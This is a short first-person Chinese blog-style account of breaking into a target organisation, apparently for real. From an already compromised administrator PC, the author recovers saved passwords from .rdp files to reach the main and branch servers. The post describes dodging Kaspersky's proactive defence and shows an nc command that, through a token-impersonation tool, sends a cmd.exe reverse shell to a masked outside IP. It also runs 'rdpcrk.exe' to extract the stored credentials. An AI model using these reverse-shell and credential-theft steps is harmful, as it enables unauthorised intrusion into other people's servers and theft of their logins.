几天前费了不少力气拿到一管理员机器,主站我盘旋了很久,没有突破口,开了80,还有一个高端端口,当然就是3389了,一阵欣喜,管理员一定会登这个服务器的3389的。
在机器是拿到了,翻了翻管理员机器里的东西,本来想装键盘记录的,发现有很多以ip命名的rdp文件,下了一个下回来打开看了一下,真幸运,保存了密码在rdp文件里的(这种情况只有读rdp的密码了,键盘记录记不到)。主站和各分站的3389都是以保存密码登录的,上传一个读取rdp密码的东西就可以读到密码了,但这时遇到一个很头痛的问题,我的马是系统权限的马,读取rdp文件的密码必须要在用户权限下。想装一个用户权限的马上去,可手里没好马,管理员机器上装了个卡巴斯基,还开了主动防御。试着折腾了一下,装其它的马,都被主动防御拦截,管理员还似乎有点发觉,开始检查机器,幸好这个马还稳当,先断开连接。
接下来仔细想了一下,到底咋搞呢,必须要得到一个用户权限的shell,再上传马上去执行就不敢了,搞不好把现在的这个权限都弄掉。
最后想起一个令牌转换的东西,试了一下直接用令牌转换工具运行rdpcrk.exe 加参数重定向到文本,结果没读取成功。于是就想到用nc通过令牌转换弹一个用户权限的shell回来。
在马里面执行cmd:change.exe c:windows c.exe xx.xx.xx.xx 123 -e cmd.exe
在本地临听123端口,接到shell后,传个东西上去,whoami,呵呵,终于得到一个用户权限的shell。
然后rdpcrk.exe xx.xx.xx.xx.rdp
成功得到密码,直登服务器,搞定。
